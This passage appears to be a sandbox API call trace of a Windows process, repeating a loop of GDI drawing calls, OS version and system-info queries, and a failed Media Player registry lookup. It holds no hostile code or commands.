hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.658] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.658] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.658] BeginPath (hdc=0x0) returned 0 [0089.658] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.658] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.658] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.658] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.658] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.658] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.659] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca0401d9 [0089.659] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc80401dc [0089.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ed [0089.659] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ee [0089.659] CombineRgn (hrgnDst=0x10456ed, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=1) returned 1 [0089.659] CombineRgn (hrgnDst=0x10456ee, hrgnSrc1=0xca0401d9, hrgnSrc2=0xc80401dc, iMode=4) returned 2 [0089.659] CreateSolidBrush (color=0xff) returned 0x21056ec [0089.659] CreateSolidBrush (color=0xff0000) returned 0x11056ef [0089.659] DeleteObject (ho=0x11056ef) returned 1 [0089.659] DeleteObject (ho=0xc80401dc) returned 1 [0089.659] DeleteObject (ho=0xca0401d9) returned 1 [0089.659] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.659] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.659] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.659] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.659] BeginPath (hdc=0x0) returned 0 [0089.659] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.659] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.659] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.659] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.659] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.659] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.659] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.660] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc90401dc [0089.660] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb0401d9 [0089.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f0 [0089.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f1 [0089.660] CombineRgn (hrgnDst=0x10456f0, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=1) returned 1 [0089.660] CombineRgn (hrgnDst=0x10456f1, hrgnSrc1=0xc90401dc, hrgnSrc2=0xcb0401d9, iMode=4) returned 2 [0089.660] CreateSolidBrush (color=0xff) returned 0x21056ef [0089.660] CreateSolidBrush (color=0xff0000) returned 0x11056f2 [0089.660] DeleteObject (ho=0x11056f2) returned 1 [0089.660] DeleteObject (ho=0xcb0401d9) returned 1 [0089.660] DeleteObject (ho=0xc90401dc) returned 1 [0089.660] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.660] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.660] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.660] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.660] BeginPath (hdc=0x0) returned 0 [0089.660] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.660] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.660] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.660] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.660] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.660] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.660] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.660] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc0401d9 [0089.660] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca0401dc [0089.660] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f3 [0089.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f4 [0089.661] CombineRgn (hrgnDst=0x10456f3, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=1) returned 1 [0089.661] CombineRgn (hrgnDst=0x10456f4, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=4) returned 2 [0089.661] CreateSolidBrush (color=0xff) returned 0x21056f2 [0089.661] CreateSolidBrush (color=0xff0000) returned 0x11056f5 [0089.661] DeleteObject (ho=0x11056f5) returned 1 [0089.661] DeleteObject (ho=0xca0401dc) returned 1 [0089.661] DeleteObject (ho=0xcc0401d9) returned 1 [0089.661] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.661] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.661] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.661] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.661] BeginPath (hdc=0x0) returned 0 [0089.661] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.661] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.661] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.661] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.661] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.661] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.661] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.661] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb0401dc [0089.661] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd0401d9 [0089.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f6 [0089.661] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f7 [0089.662] CombineRgn (hrgnDst=0x10456f6, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=1) returned 1 [0089.662] CombineRgn (hrgnDst=0x10456f7, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=4) returned 2 [0089.662] CreateSolidBrush (color=0xff) returned 0x21056f5 [0089.662] CreateSolidBrush (color=0xff0000) returned 0x11056f8 [0089.662] DeleteObject (ho=0x11056f8) returned 1 [0089.662] DeleteObject (ho=0xcd0401d9) returned 1 [0089.662] DeleteObject (ho=0xcb0401dc) returned 1 [0089.662] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.662] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.662] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.662] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.662] BeginPath (hdc=0x0) returned 0 [0089.662] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.662] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.662] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.662] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.662] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.662] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.662] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.662] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce0401d9 [0089.662] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc0401dc [0089.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456f9 [0089.662] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456fa [0089.662] CombineRgn (hrgnDst=0x10456f9, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=1) returned 1 [0089.663] CombineRgn (hrgnDst=0x10456fa, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=4) returned 2 [0089.663] CreateSolidBrush (color=0xff) returned 0x21056f8 [0089.663] CreateSolidBrush (color=0xff0000) returned 0x11056fb [0089.663] DeleteObject (ho=0x11056fb) returned 1 [0089.663] DeleteObject (ho=0xcc0401dc) returned 1 [0089.663] DeleteObject (ho=0xce0401d9) returned 1 [0089.663] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.663] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.663] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.663] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.663] BeginPath (hdc=0x0) returned 0 [0089.663] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.663] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.663] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.663] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.663] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.663] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.663] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd0401dc [0089.663] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf0401d9 [0089.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456fc [0089.663] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456fd [0089.663] CombineRgn (hrgnDst=0x10456fc, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=1) returned 1 [0089.663] CombineRgn (hrgnDst=0x10456fd, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=4) returned 2 [0089.663] CreateSolidBrush (color=0xff) returned 0x21056fb [0089.663] CreateSolidBrush (color=0xff0000) returned 0x11056fe [0089.664] DeleteObject (ho=0x11056fe) returned 1 [0089.664] DeleteObject (ho=0xcf0401d9) returned 1 [0089.664] DeleteObject (ho=0xcd0401dc) returned 1 [0089.664] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.664] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.664] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.664] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.664] BeginPath (hdc=0x0) returned 0 [0089.664] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.664] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.664] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.664] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.664] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd00401d9 [0089.664] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce0401dc [0089.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ff [0089.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045700 [0089.664] CombineRgn (hrgnDst=0x10456ff, hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=1) returned 1 [0089.664] CombineRgn (hrgnDst=0x1045700, hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=4) returned 2 [0089.664] CreateSolidBrush (color=0xff) returned 0x21056fe [0089.664] CreateSolidBrush (color=0xff0000) returned 0x1105701 [0089.664] DeleteObject (ho=0x1105701) returned 1 [0089.664] DeleteObject (ho=0xce0401dc) returned 1 [0089.664] DeleteObject (ho=0xd00401d9) returned 1 [0089.665] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.665] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.665] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.665] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.665] BeginPath (hdc=0x0) returned 0 [0089.665] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.665] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.665] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.665] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.665] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.665] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf0401dc [0089.665] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd10401d9 [0089.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045702 [0089.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045703 [0089.665] CombineRgn (hrgnDst=0x1045702, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=1) returned 1 [0089.665] CombineRgn (hrgnDst=0x1045703, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=4) returned 2 [0089.665] CreateSolidBrush (color=0xff) returned 0x2105701 [0089.665] CreateSolidBrush (color=0xff0000) returned 0x1105704 [0089.665] DeleteObject (ho=0x1105704) returned 1 [0089.665] DeleteObject (ho=0xd10401d9) returned 1 [0089.665] DeleteObject (ho=0xcf0401dc) returned 1 [0089.665] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.665] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.666] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.666] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.666] BeginPath (hdc=0x0) returned 0 [0089.666] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.666] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.666] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.666] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.666] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.666] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd20401d9 [0089.666] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd00401dc [0089.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045705 [0089.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045706 [0089.666] CombineRgn (hrgnDst=0x1045705, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=1) returned 1 [0089.666] CombineRgn (hrgnDst=0x1045706, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=4) returned 2 [0089.666] CreateSolidBrush (color=0xff) returned 0x2105704 [0089.666] CreateSolidBrush (color=0xff0000) returned 0x1105707 [0089.666] DeleteObject (ho=0x1105707) returned 1 [0089.666] DeleteObject (ho=0xd00401dc) returned 1 [0089.666] DeleteObject (ho=0xd20401d9) returned 1 [0089.666] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.666] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.666] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.667] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.667] BeginPath (hdc=0x0) returned 0 [0089.667] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.667] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.667] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.667] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.667] 